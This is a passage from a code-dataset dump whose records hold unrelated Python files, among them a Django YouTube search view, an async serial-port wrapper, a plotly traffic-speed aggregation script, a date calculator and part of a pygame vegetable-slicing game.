Input for run\n\ndef getInput():\n '''Get input from file input.txt, or file specified in config in case of testrun.'''\n fileInput = collections.deque()\n\n # INPUT FILE PATH SPECIFIED ABOVE ***\n if TESTRUN:\n file1 = open(filepath, 'r')\n lines = file1.readlines()\n \n # INPUT IS DEFAULT INPUT.TXT (if make cmd is used)\n else: \n lines = fileinput.input()\n \n # Create a queue\n for line in lines:\n if line != \"\\n\":\n fileInput.append(line.rstrip())\n\n return fileInput\n\n#--------------------------------------------------------\n# ------ FILE INPUT SETTINGS END ------------------------\n#--------------------------------------------------------\n","sub_path":"Project1/Project1_handin_eythorb19/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"175979386","text":"from django.shortcuts import render, redirect\nimport requests\nfrom django.conf import settings\nfrom isodate import parse_duration\n\n# Create your views here.\n\ndef index(request):\n link = 'https://www.googleapis.com/youtube/v3/search/'\n videos = 'https://www.googleapis.com/youtube/v3/videos/'\n\n search_args = {\n 'part' : 'snippet',\n 'q' : request.POST['search'],\n 'key' : settings.YOUTUBE_DATA_API_KEY,\n 'max results' : 30,\n 'type' : 'video'\n }\n\n query = requests.get(link, params=search_args)\n\n results = query.json()['items']\n\n video_list = []\n for result in results:\n video_list.append(result['id']['videoId'])\n \n video_args = {\n 'key' : settings.YOUTUBE_DATA_API_KEY,\n 'part' : 'snippet,contentDetails',\n 'id' : ','.join(video_list),\n 'maxResults' : 30\n }\n\n query = requests.get(videos, params=video_args)\n\n results = query.json()['items']\n\n for result in results:\n video_item = {\n 'title' : result['snippet']['title'],\n 'id' : result['id'],\n 'url' : f'https://www.youtube.com/watch?v={ result[\"id\"] }',\n 'duration' : int(parse_duration(result['contentDetails']['duration']).total_seconds()),\n 'thumbnail' : result['snippet']['thumbnails']['high']['url']\n }\n video_list.append(video_item)\n \n context = {\n 'videos' : video_list\n }\n\n return render(request, 'search/results.html', context)\n","sub_path":"youtube_search/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"554728035","text":"#coding:utf-8\n\"\"\"\n:param 调用窗口,加写代码,实现代码与窗口分离\n\"\"\"\n\nfrom qt04 import Ui_MainWindow # 导入生成form.py里生成的类\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport sys\n\nclass mywindow(QtWidgets.QMainWindow, Ui_MainWindow):\n def __init__(self):\n super(mywindow, self).__init__() #执行父类\n self.new = Ui_MainWindow()\n self.new.setupUi(self)\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n myshow = mywindow()\n myshow.show()\n sys.exit(app.exec_())","sub_path":"qt/qt01/qt04_main2.py","file_name":"qt04_main2.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"77965252","text":"#\n# Copyright (c) 2010-2016, MIT Probabilistic Computing Project\n#\n# Lead Developers: Dan Lovell and Jay Baxter\n# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka\n# Research Leads: Vikash Mansinghka, Patrick Shafto\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport numpy\nimport csv\nimport os\nimport ast\nimport pickle\n\nimport crosscat.utils.inference_utils as iu\nimport crosscat.utils.xnet_utils as xu\n\nimport pdb\n\ndef is_hadoop_file(filename):\n\tname, extension = os.path.splitext(filename)\n\tif extension is 'gz':\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef parse_line(test, mi, linfoot):\n\tindex = test['id']\n\tnum_rows = test['num_rows']\n\tnum_cols = test['num_cols']\n\tnum_views = test['num_views']\n\tnum_clusters = test['num_clusters']\n\tcorr = test['corr']\n\t\n\trow = [index, num_rows, num_cols, num_views, num_clusters, corr, mi, linfoot]\n\n\treturn row\n\ndef hadoop_to_dict_generator(test_key_file_object):\n\t# return read cursor to the start (or this generator cannot be called again)\n\ttest_key_file_object.seek(0)\n\tfor line in test_key_file_object:\n\t\tdict_line = xu.parse_hadoop_line(line)\n\t\tyield dict_line\n\t\ndef parse_data_to_csv(test_key_filename, params_dict, n_tests, output_filename):\n\t# open input file and convert to list of dicts\n\ttest_key_file_object = open(test_key_filename, 'rb')\n\tinput_lines = hadoop_to_dict_generator(test_key_file_object)\n\n\t# open output file and convert to list of dicts\n\toutput_file_object = open(output_filename, 'rb')\n\tresults = hadoop_to_dict_generator(output_file_object)\n\t\n\tn_datasets = params_dict['n_datasets']\n\tn_samples = params_dict['n_samples']\n\n\theader = ['id', 'num_rows', 'num_cols', 'num_views', 'num_clusters', 'corr','MI','Linfoot']\n\n\t# data_mi = [[[0] for i in range(n_datasets)] for i in range(n_tests)]\n\t# data_linfoot = [[[0] for i in range(n_datasets)] for i in range(n_tests)]\n\t# counts = [[[0] for i in range(n_datasets)] for i in range(n_tests)]\n\n\tdata_mi = [0.0]*n_tests\n\tdata_linfoot = [0.0]*n_tests\n\tcounts = [0.0]*n_tests\n\n\n\tfor result in results:\n\t\tres = result[1] # because it's a tuple with an id at index 0\n\t\ttest_idx = res['id']\n\t\ttest_dataset = res['dataset']\n\t\ttest_sample = res['sample']\n\t\t\n\t\tdata_mi[test_idx] += float(res['mi']) \n\t\tdata_linfoot[test_idx] += float(iu.mutual_information_to_linfoot(res['mi']))\n\t\tcounts[test_idx] += 1.0\n\t\n\tfor test_ids in range(n_tests):\n\t\tdata_mi[test_idx] /= counts[test_idx]\n\t\tdata_linfoot[test_idx] /= counts[test_idx]\n\n\t# # calculate the mean over samples\n\t# for test in range(n_tests):\n\t\t\n\t# \tfor dataset in range(n_datasets):\n\t# \t\ttry:\n\t# \t\t\tdata_mi[test][dataset] = numpy.array(data_mi[test][dataset],dtype=float)\n\t# \t\texcept ValueError:\n\t# \t\t\tpdb.set_trace()\n\n\t# \t\ttry:\n\t# \t\t\tdata_mi[test][dataset] = numpy.mean(data_mi[test][dataset],axis=0)\n\t# \t\texcept TypeError:\n\t# \t\t\tpdb.set_trace()\n\n\t# \t\tdata_linfoot[test][dataset] = mi_to_linfoot(data_mi[test][dataset])\n\n\t# \t\tdata_mi[test][dataset] = numpy.mean(data_mi[test][dataset])\n\t# \t\tdata_linfoot[test][dataset] = numpy.mean(data_linfoot[test][dataset])\n\n\t# \t# now calculate the mean over datasets\n\t# \tdata_mi[test] = numpy.mean(numpy.array(data_mi[test]))\n\t# \tdata_linfoot[test] = numpy.mean(numpy.array(data_linfoot[test]))\n\t\n\tname, extension = os.path.splitext(output_filename)\n\n\toutfile = name + '.csv'\n\n\twith open(outfile,'w') as csvfile:\n\t\tcsvwriter = csv.writer(csvfile,delimiter=',')\n\t\tcsvwriter.writerow(header)\n\t\tcurrent_idx = -1\n\t\tfor test in input_lines:\n\t\t\tres = test[1]\n\t\t\ttest_idx = res['id']\n\t\t\tif test_idx != current_idx:\n\t\t\t\tcurrent_idx = test_idx\n\t\t\t\tline = parse_line(res, data_mi[test_idx], data_linfoot[test_idx])\n\t\t\t\tcsvwriter.writerow(line)\n\ndef mi_to_linfoot(mi):\n\t#\n\t# linfoot = numpy.zeros(mi.shape)\n\t# if len(mi.shape) == 1:\n\t# \tfor entry in range(mi.size):\n\t# \t\tlinfoot[entry] = iu.mutual_information_to_linfoot(mi[entry])\n\t# else:\n\t# \tfor r in range(mi.shape[0]):\n\t# \t\tfor c in range(mi.shape[1]):\n\t# \t\t\tlinfoot[r,c] = iu.mutual_information_to_linfoot(mi[r,c])\n\n\n\t# return linfoot\n\treturn [iu.mutual_information_to_linfoot(m) for m in mi]\n\nif __name__ == \"__main__\":\n\n\timport argparse\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('--key_filename', type=str)\n\tparser.add_argument('--params_filename', type=str)\n\tparser.add_argument('--n_tests', type=int)\n\tparser.add_argument('--output_filename', type=str)\n\n\targs = parser.parse_args()\n\n\tkey_filename = args.key_filename\n\toutput_filename = args.output_filename\n\tn_tests = args.n_tests\n\tparams_filename = args.params_filename\n\tparams_dict = pickle.load( open( params_filename, \"rb\" ))\n\n\n\n\tparse_data_to_csv(key_filename, params_dict, n_tests, output_filename)\n\n","sub_path":"src/tests/mi_tests/parse_mi.py","file_name":"parse_mi.py","file_ext":"py","file_size_in_byte":5156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"214209245","text":"import asyncio\nimport os\nimport serial\n\n\n__all__ = [\"AsyncSerial\"]\n\n\nclass AsyncSerialBase:\n def __init__(self, *args, loop=None, **kwargs):\n self.ser = serial.serial_for_url(*args, **kwargs)\n\n if loop is None:\n loop = asyncio.get_event_loop()\n self._loop = loop\n\n self.read_future = None\n self.write_future = None\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n\n async def read_exactly(self, n):\n data = bytesarray()\n while len(data) < n:\n remaining = n - len(data)\n data += await self.read(remaining)\n return data\n\n async def write_exactly(self, data):\n while data:\n res = await self.write(data)\n data = data[res:]\n\n\nif os.name != \"nt\":\n class AsyncSerial(AsyncSerialBase):\n def fileno(self):\n return self.ser.fd\n\n def _read_ready(self, n):\n self._loop.remove_reader(self.fileno())\n if not self.read_future.cancelled():\n try:\n res = os.read(self.fileno(), n)\n except Exception as exc:\n self.read_future.set_exception(exc)\n else:\n self.read_future.set_result(res)\n self.read_future = None\n\n def read(self, n):\n assert self.read_future is None or self.read_future.cancelled()\n future = asyncio.Future(loop=self._loop)\n\n if n == 0:\n future.set_result(b\"\")\n else:\n try:\n res = os.read(self.fileno(), n)\n except Exception as exc:\n future.set_exception(exc)\n else:\n if res:\n future.set_result(res)\n else:\n self.read_future = future\n self._loop.add_reader(self.fileno(),\n self._read_ready, n)\n\n return future\n\n def _write_ready(self, data):\n self._loop.remove_writer(self.fileno())\n if not self.write_future.cancelled():\n try:\n res = os.write(self.fileno(), data)\n except Exception as exc:\n self.write_future.set_exception(exc)\n else:\n self.write_future.set_result(res)\n self.write_future = None\n\n def write(self, data):\n assert self.write_future is None or self.write_future.cancelled()\n future = asyncio.Future(loop=self._loop)\n\n if len(data) == 0:\n future.set_result(0)\n else:\n try:\n res = os.write(self.fileno(), data)\n except BlockingIOError:\n self.write_future = future\n self._loop.add_writer(self.fileno(),\n self._write_ready, data)\n except Exception as exc:\n future.set_exception(exc)\n else:\n future.set_result(res)\n\n return future\n\n def close(self):\n if self.read_future is not None:\n self._loop.remove_reader(self.fileno())\n if self.write_future is not None:\n self._loop.remove_writer(self.fileno())\n self.ser.close()\n\nelse:\n class AsyncSerial(AsyncSerialBase):\n \"\"\"Requires ProactorEventLoop\"\"\"\n def fileno(self):\n return self.ser._port_handle\n\n def read(self, n):\n return self._loop._proactor.recv(self.fileno(), n)\n\n def write(self, data):\n return self._loop._proactor.send(self.fileno(), data)\n\n def close(self):\n self.ser.close()\n","sub_path":"serial/aio.py","file_name":"aio.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"535645427","text":"########## Select correct directory\nimport os\nimport numpy as np\nimport pandas as pd\nimport plotly.plotly as py\nimport plotly.offline as po\nimport plotly.graph_objs as go\n\n#### Example: Restrict to just April\n#df = df.loc[lambda df: df['Month'] == 4]\n\n########## Example: AGGREGATE 5-minute speeds and GROUP BY month, day, ap\n#agg1 = {'speed' : {'avgSpeed' : 'mean'}}\n#df15 = df.groupby(['tmc_code','Date','ap'], as_index=False).agg(agg1, as_index=False)\n#pdf = df15[['tmc_code', 'tstamp', 'speed']]\n#pdf.to_csv('I4_P_15min_Apr.csv', index=False)\n\ndef extract_vals(date_str):\n is_approx = False\n date, time, ampm = date_str.split(' ')\n hour, minute, second = time.split(':')\n \n if ampm.endswith('*'): # Check if is approximated (has an *) and remove '*'\n is_approx = True\n ampm = ampm[:2]\n\n is_pm = ampm.lower() == 'pm'\n ap = (int(hour) % 12) * 4 + int(minute) // 15 + (48 if is_pm else 0)\n return date, ap, is_approx\n\ndef create_columns(data):\n dates, aps, is_approxs = zip(*data)\n return list(dates), list(aps), list(is_approxs)\n\ndef percentile(n):\n def percentile_(x):\n return np.percentile(x,n)\n percentile_.__name__='percentile_%s' % n\n return percentile_\n\n########## Changing to the correct directory\nos.chdir('C:\\\\Users\\ltrask\\Documents\\BlueMac Data') \n\n########## Load 5-minute csv into pandas dataframe\nnumLinesToSkip = 0\nf = open('DIGI145_to_DIGI157.csv', 'r')\nfor line in f:\n tokens = line.split(',')\n if tokens[0] == \"Start Time\":\n break\n numLinesToSkip+=1\n\ndf = pd.read_csv('DIGI145_to_DIGI157.csv', skiprows=numLinesToSkip)\n#df['Date'] = [dStr.split(' ')[0] for dStr in df['Start Time']]\n#df['AP'] = [extract_ap_from_time(dStr) for dStr in df['Start Time']]\ndf['Date'], df['AP'], df['is_approx'] = create_columns([extract_vals(dStr) for dStr in df['Start Time']])\n\n######### Aggregating for RL Data\napGroup = df.groupby(['AP'])\nspeedCol = apGroup['Average Speed(mph)']\ndfRL=speedCol.agg([np.mean, percentile(95), percentile(5)])\n\ntimeStamps = ['2000-01-01 ' +str(apIdx // 4)+':'+str((apIdx % 4)*15)+':00' for apIdx in dfRL.index]\n\ndata = [\n go.Scatter(\n x=timeStamps, \n y=dfRL['mean'],\n fill = 'tonexty',\n fillcolor = '#B0C4DE',\n line=dict(color='rgb(205,92,92)'),\n name='Average'\n ),\n go.Scatter(\n x=timeStamps, \n y=dfRL['percentile_95'],\n line=dict(color='rgb(176,196,222)'),\n fillcolor = '#B0C4DE',\n fill = 'tonexty',\n name='95th Percentile'\n ),\n go.Scatter(\n x=timeStamps, \n y=dfRL['percentile_5'],\n fillcolor = '#FFFFFF',\n fill = 'tozeroy',\n line=dict(color='rgb(176,196,222)'),\n name='5th Percentile'\n )\n]\n\nlayout = go.Layout(\n title='Average Speed Across All Days',\n yaxis=dict(title='Speed (mph)'),\n xaxis=dict(title='Analysis Period', tickformat=\"%I:%M%p\")\n)\n\nfig = go.Figure(data=data, layout=layout)\n\npo.init_notebook_mode()\npo.iplot(fig, filename='stacked-area')\n\n","sub_path":"speed_agg.py","file_name":"speed_agg.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"325688480","text":"\"\"\"\nTarea: Siguiente día\nAutor: \nFecha: 25/mar/20\nGrupo: ESI-232\nProfesor: Jorge A. Zaldívar Carrillo\nDescripción:\n\"\"\"\n\n# Declaraciones\ndef es_bisiesto(anho):\n \"Determina si el año es bisiesto\"\n if anho % 400 == 0 or anho % 4 == 0 and anho % 100 != 0:\n bisiesto = True\n else:\n bisiesto = False\n return bisiesto\n\n\ndef dias_del_mes(mes, anho):\n \"Calcula los días que tiene un mes\"\n if mes in [1, 3, 5, 7, 8, 10, 12]:\n dias = 31\n elif mes in [4, 6, 9, 11]:\n dias = 30\n else:\n if es_bisiesto(anho):\n dias = 29\n else:\n dias = 28\n return dias\n\n\n# Programa principal\ndef main():\n # Entradas\n dia = int(input(\"Día: \"))\n mes = int(input(\"Mes: \"))\n anho = int(input(\"Año: \"))\n\n # Proceso\n dia += 1\n if dia > dias_del_mes(mes, anho):\n dia = 1\n mes += 1\n if mes > 12:\n mes = 1\n anho += 1\n\n # Salidas\n print()\n print(\"Día:\", dia)\n print(\"Mes:\", mes)\n print(\"Año: \", anho)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"dia_siguiente.py","file_name":"dia_siguiente.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"643888397","text":"import math\nfrom random import randint\n\nfrom pygame.locals import *\nimport pygame\nimport sys\nfrom pygame.locals import *\n\npygame.init()\n\n# Constants\nwindowWidth = 500\nwindowHeight = 500\n\n# Surface\nfactor = 5\nDISPLAYSURF = pygame.display.set_mode((windowWidth, windowHeight), pygame.RESIZABLE)\nsurfaceRect = DISPLAYSURF.get_rect()\npygame.display.set_caption('Root Ninja')\n\n# Time\nFPS = 160\nFPSCLOCK = pygame.time.Clock()\n\n# Colors\n\nRED = (255, 0, 0)\nBLACK = (0, 0, 0)\nGREY = (128, 128, 128)\n\n# Global Variables\n\nisFast = False\n\nopenScreenRects = [] # stores rectangles of the opening screen\ngameStarted = False # when is gameStarted is False, start screen appears\ngameScreenRect = None\n\nresizeGameScreenRect = None\noldFactorLength = 1\n\nrootGroup = pygame.sprite.Group()\n\nscore = 0\nlivesLeft = 3\n\n# CLASSES\n\nclass Fruit(pygame.sprite.Sprite):\n def __init__(self, images, startPosAdd, vertexPosAdd, isBomb):\n pygame.sprite.Sprite.__init__(self)\n global resizeGameScreenRect\n\n self.images = images # the fruit images, an array with animation images in order, last image is explode img\n self.image = images[0] # self.image is from the Sprite class\n self.imgIndex = 0\n self.rect = self.image.get_rect() # from the Sprite class\n self.curPosAddX, self.curPosAddY = startPosAdd\n self.vertexPosAddX, self.vertexPosAddY = vertexPosAdd\n self.startXPos, self.startYPos = gameScreenRect.left + self.curPosAddX, gameScreenRect.top + self.curPosAddY\n self.vertexXPos, self.vertexYPos = gameScreenRect.left + vertexPosAdd[0], gameScreenRect.top + vertexPosAdd[1]\n self.curPosX, self.curPosY = self.startXPos, self.startYPos\n self.reachedVertex = False\n self.speedX, self.speedY = 5, -5\n self.setNewSpeed()\n self.movesDone = 0\n self.sliceImgTime = 0\n self.hasBeenSliced = False\n self.withCombo = False # boolean that means if False then the Fruit isn't to be added to the combo num\n self.image = self.images[self.imgIndex]\n self.isBomb = isBomb\n self.lostPoints = 0\n\n self.resizeImg(resizeGameScreenRect, True)\n\n self.image = self.images[self.imgIndex]\n self.setImgPos()\n\n self.mask = pygame.mask.from_surface(self.image)\n\n def setMask(self):\n self.mask = pygame.mask.from_surface(self.image)\n\n def checkHasBeenSliced(self):\n global score, isFast\n\n if self.hasBeenSliced == True:\n if self.sliceImgTime == 0 and self.isBomb == False:\n score += 10\n if isFast == True:\n self.withCombo = True\n\n if self.sliceImgTime == 0 and self.isBomb == True:\n if score < 10:\n self.lostPoints = score\n score = 0\n elif score >= 10:\n self.lostPoints = 10\n score -= 10\n\n self.image = self.images[4]\n self.sliceImgTime += 1;\n\n if self.isBomb == True and self.sliceImgTime <= 6:\n openingFONT = pygame.font.SysFont('chiller', int(gameScreenRect.w / 480 * 50))\n textSurface = openingFONT.render('--- ' + str(self.lostPoints), True, BLACK, GREY)\n textRect = textSurface.get_rect()\n textRect.topleft = (self.curPosX+self.rect.w/2, self.curPosY)\n DISPLAYSURF.blit(textSurface, textRect)\n\n def checkShouldRemoveRoot(self): # returns true means remove fruit\n if self.hasBeenSliced == True and self.sliceImgTime >= 15:\n #pointSpriteGroup.add()\n return True\n elif self.curPosX < 0 or self.curPosX > windowWidth or self.curPosY < 0 or self.curPosY > windowHeight:\n return True\n else:\n return False\n\n def setImgPos(self):\n self.rect.center = int(self.curPosX), int(self.curPosY)\n\n def setNewSpeed(self):\n self.endXPos, self.endYPos = 0, 0\n if self.vertexXPos - self.startXPos >= 0:\n self.endXPos, self.endYPos = self.startXPos + int(2 * (self.vertexXPos - self.startXPos)), self.startYPos\n else:\n self.endXPos, self.endYPos = self.startXPos - int(2 * (self.startXPos - self.vertexXPos)), self.startYPos\n\n xDif = self.vertexXPos - self.startXPos\n yDif = self.vertexYPos - self.startYPos\n\n if self.curPosY <= self.vertexYPos or self.reachedVertex == True:\n self.reachedVertex = True\n xDif = self.endXPos - self.vertexXPos\n yDif = self.endYPos - self.vertexYPos\n\n slantLength = math.sqrt(xDif*xDif + yDif*yDif)\n\n factor = gameScreenRect.w / 480\n\n self.speedX = xDif * (40*factor/slantLength)\n self.speedY = yDif * (40*factor/slantLength)\n\n\n def moveFruit(self): # each time the fruit moves a certain distance, the image should change so the fruit is rotating\n self.movesDone += 1\n\n self.setNewSpeed()\n\n if self.imgIndex == 3:\n self.imgIndex = 0\n else:\n self.imgIndex += 1\n\n if self.movesDone >= 3:\n if not self.imgIndex == 3:\n self.movesDone = 0\n self.image = self.images[self.imgIndex + 1]\n\n self.image = self.images[self.imgIndex]\n self.curPosX, self.curPosY = self.curPosX + self.speedX, self.curPosY + self.speedY\n self.setImgPos()\n self.setMask()\n self.checkHasBeenSliced()\n # add more\n\n def resizeImg(self, oldGameScreenRect, isSpawn): # resize image to screen size dimensions\n global resizeGameScreenRect, oldFactorLength\n\n if oldGameScreenRect:\n factorLengthX = gameScreenRect.w / oldGameScreenRect.w\n factorLengthY = gameScreenRect.h / oldGameScreenRect.h\n factorLength = factorLengthX\n\n if factorLengthX < factorLengthY:\n factorLength = factorLengthX\n else:\n factorLength = factorLengthY\n\n resizeGameScreenRect = oldGameScreenRect\n oldFactorLength = factorLength\n\n if isSpawn == True:\n factorLength = gameScreenRect.w/480\n\n for i, img in enumerate(self.images):\n curW, curH = img.get_rect().w, img.get_rect().h\n self.images[i] = pygame.transform.smoothscale(img, (int(curW * factorLength), int(curH * factorLength)))\n\n self.image = self.images[self.imgIndex]\n self.setImgPos()\n\n# GLOBAL METHODS\n\ndef drawXLives():\n global livesLeft\n blackImg = pygame.image.load('BlackX.png')\n redImg = pygame.image.load('RedX.png')\n rect = blackImg.get_rect()\n black = pygame.transform.smoothscale(blackImg, (int(rect.w * gameScreenRect.w/480), int(rect.h * gameScreenRect.w/480)))\n red = pygame.transform.smoothscale(redImg, (int(rect.w * gameScreenRect.w/480), int(rect.h * gameScreenRect.w/480)))\n x1, x2, x3 = black, black, black\n if livesLeft <= 2:\n x1 = red\n if livesLeft <= 1:\n x2 = red\n if livesLeft <= 0:\n x3 = red\n\n rect = black.get_rect()\n\n rect.center = (int(windowWidth / 2 + rect.w + 10), int(gameScreenRect.top + gameScreenRect.h / 12))\n DISPLAYSURF.blit(x1, rect)\n rect.center = (int(windowWidth / 2 + rect.w*2 + 10), int(gameScreenRect.top + gameScreenRect.h / 12))\n DISPLAYSURF.blit(x2, rect)\n rect.center = (int(windowWidth / 2 + rect.w*3 + 10), int(gameScreenRect.top + gameScreenRect.h / 12))\n DISPLAYSURF.blit(x3, rect)\n\ndef checkComboPoints():\n global score, rootGroup\n\n numCombos = 0\n for root in rootGroup:\n if root.withCombo == True:\n numCombos += 1\n root.withCombo = False\n posX, posY = root.curPosX + root.rect.w/2, root.curPosY\n\n if numCombos > 1:\n score += numCombos\n openingFONT = pygame.font.SysFont('chiller', int(gameScreenRect.w / 480 * 50))\n textSurface = openingFONT.render('+++ ' + str(numCombos), True, BLACK, GREY)\n textRect = textSurface.get_rect()\n textRect.center = (posX, posY)\n DISPLAYSURF.blit(textSurface, textRect)\n\ndef drawScore():\n global score\n openingFONT = pygame.font.SysFont('chiller', int(gameScreenRect.w/480 * 30))\n textSurface = openingFONT.render('Score: ' + str(score), True, BLACK, GREY)\n textRect = textSurface.get_rect()\n textRect.center = (int(windowWidth / 2), int(windowHeight / 12))\n DISPLAYSURF.blit(textSurface, textRect)\n\ndef getLinePoints(initPosX, initPosY, curPosX, curPosY):\n linePointAry = []\n #y=(Ay-By)/(Ax-Bx)*(x-Ax)+Ay\n\n start, end = None, None\n\n if initPosX >= curPosX:\n start = curPosX\n end = initPosX\n else:\n start = initPosX\n end = curPosX\n for x in range(start, end+1):\n if not initPosX-curPosX == 0:\n y = (initPosY-curPosY)/(initPosX-curPosX) * (x - initPosX) + initPosY\n linePointAry.append((x, y))\n\n return linePointAry\n\ndef checkMouseRootCollide(initPosX, initPosY, curPos):\n global rootGroup\n curPosX, curPosY = curPos\n for root in rootGroup:\n linePointAry = getLinePoints(initPosX, initPosY, curPosX, curPosY)\n\n for point in linePointAry:\n pointX, pointY = point\n\n if root.rect.collidepoint((pointX, pointY)):\n root.hasBeenSliced = True\n print(\"poo\")\n\n\ndef getSlicedRoots(lineRect, collidedRoots):\n for cRoot in collidedRoots:\n collidePoint = pygame.sprite.collide_mask(lineRect, cRoot)\n cRoot.hasBeenSliced = True\n\ndef drawBlackOutsideOfGSR(): # GSR = gameScreenRect\n right = gameScreenRect.right\n bottom = gameScreenRect.bottom\n\n pygame.draw.rect(DISPLAYSURF, BLACK, (0, 0, gameScreenRect.left, windowHeight))\n pygame.draw.rect(DISPLAYSURF, BLACK, (0, 0, windowWidth, gameScreenRect.top))\n pygame.draw.rect(DISPLAYSURF, BLACK, (right, 0, gameScreenRect.left, windowHeight))\n pygame.draw.rect(DISPLAYSURF, BLACK, (0, bottom, windowWidth, gameScreenRect.top))\n\ndef removeRoots():\n global livesLeft, rootGroup\n for root in rootGroup:\n if root.checkShouldRemoveRoot() == True:\n if root.hasBeenSliced == False and root.isBomb == False:\n livesLeft -= 1\n root.kill()\n\ndef moveAllRoots():\n global rootGroup\n for root in rootGroup:\n root.moveFruit()\n\ndef reconfigAllRootsPosAndSize(oldGameScreenRect):\n global resizeFactor, rootGroup\n\n rooty = addNewRanRoot()\n rootGroup.add(rooty)\n\n for i, root in enumerate(rootGroup):\n root.resizeImg(oldGameScreenRect, False)\n root.curPosAddX, root.curPosAddY = reconfigFruitPos(root.curPosAddX, root.curPosAddY, oldGameScreenRect)\n root.curPosX, root.curPosY = gameScreenRect.left + root.curPosAddX, gameScreenRect.top + root.curPosAddY\n root.startXPos, root.startYPos = reconfigFruitPos(root.startXPos, root.startYPos, oldGameScreenRect)\n #root.setImgPos()\n root.vertexPosAddX, root.vertexPosAddY = reconfigFruitPos(root.vertexPosAddX, root.vertexPosAddY, oldGameScreenRect)\n root.vertexXPos, root.vertexYPos = gameScreenRect.left + root.vertexPosAddX, gameScreenRect.top + root.vertexPosAddY\n root.setImgPos()\n\n rooty.kill()\n\n\ndef addNewRanRoot():\n images = None\n randy = randint(0, 9)\n isBomb = False\n if randy == 0:\n img1 = pygame.image.load('ClassicPotato-1.png')\n img2 = pygame.image.load('ClassicPotato-2.png')\n img3 = pygame.image.load('ClassicPotato-3.png')\n img4 = pygame.image.load('ClassicPotato-4.png')\n img5 = pygame.image.load('ClassicPotato-7.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 1:\n img1 = pygame.image.load('Carrot-1.png.png')\n img2 = pygame.image.load('Carrot-2.png.png')\n img3 = pygame.image.load('Carrot-3.png.png')\n img4 = pygame.image.load('Carrot-4.png.png')\n img5 = pygame.image.load('Carrot-7.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 2:\n img1 = pygame.image.load('Garlic-1.png.png')\n img2 = pygame.image.load('Garlic-2.png.png')\n img3 = pygame.image.load('Garlic-3.png.png')\n img4 = pygame.image.load('Garlic-4.png.png')\n img5 = pygame.image.load('Garlic-6.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 3:\n img1 = pygame.image.load('PurpleVitelottePotato-1.png.png')\n img2 = pygame.image.load('PurpleVitelottePotato-2.png.png')\n img3 = pygame.image.load('PurpleVitelottePotato-3.png.png')\n img4 = pygame.image.load('PurpleVitelottePotato-4.png.png')\n img5 = pygame.image.load('PurpleVitelottePotato-6.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 4:\n img1 = pygame.image.load('Radish-1.png.png')\n img2 = pygame.image.load('Radish-2.png.png')\n img3 = pygame.image.load('Radish-3.png.png')\n img4 = pygame.image.load('Radish-4.png.png')\n img5 = pygame.image.load('Radish-8.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 5:\n img1 = pygame.image.load('RedLauraPotato-1.png.png')\n img2 = pygame.image.load('RedLauraPotato-2.png.png')\n img3 = pygame.image.load('RedLauraPotato-3.png.png')\n img4 = pygame.image.load('RedLauraPotato-4.png.png')\n img5 = pygame.image.load('RedLauraPotato-7.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 6:\n img1 = pygame.image.load('SweetPotato-1.png.png')\n img2 = pygame.image.load('SweetPotato-2.png.png')\n img3 = pygame.image.load('SweetPotato-3.png.png')\n img4 = pygame.image.load('SweetPotato-4.png.png')\n img5 = pygame.image.load('SweetPotato-5.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 7:\n img1 = pygame.image.load('Turnip-1.png.png')\n img2 = pygame.image.load('Turnip-2.png.png')\n img3 = pygame.image.load('Turnip-3.png.png')\n img4 = pygame.image.load('Turnip-4.png.png')\n img5 = pygame.image.load('Turnip-10.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 8:\n img1 = pygame.image.load('YukonGoldPotato-1.png.png')\n img2 = pygame.image.load('YukonGoldPotato-2.png.png')\n img3 = pygame.image.load('YukonGoldPotato-3.png.png')\n img4 = pygame.image.load('YukonGoldPotato-4.png.png')\n img5 = pygame.image.load('YukonGoldPotato-7.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 9:\n img1 = pygame.transform.smoothscale(pygame.image.load('Bomb-1.png.png'), (128, 128))\n img2 = pygame.transform.smoothscale(pygame.image.load('Bomb-2.png.png'), (128, 128))\n img3 = pygame.transform.smoothscale(pygame.image.load('Bomb-3.png.png'), (128, 128))\n img4 = pygame.transform.smoothscale(pygame.image.load('Bomb-4.png.png'), (128, 128))\n img5 = pygame.transform.smoothscale(pygame.image.load('Bomb-6.png.png'), (128, 128))\n images = [img1, img2, img3, img4, img5]\n isBomb = True\n\n img, 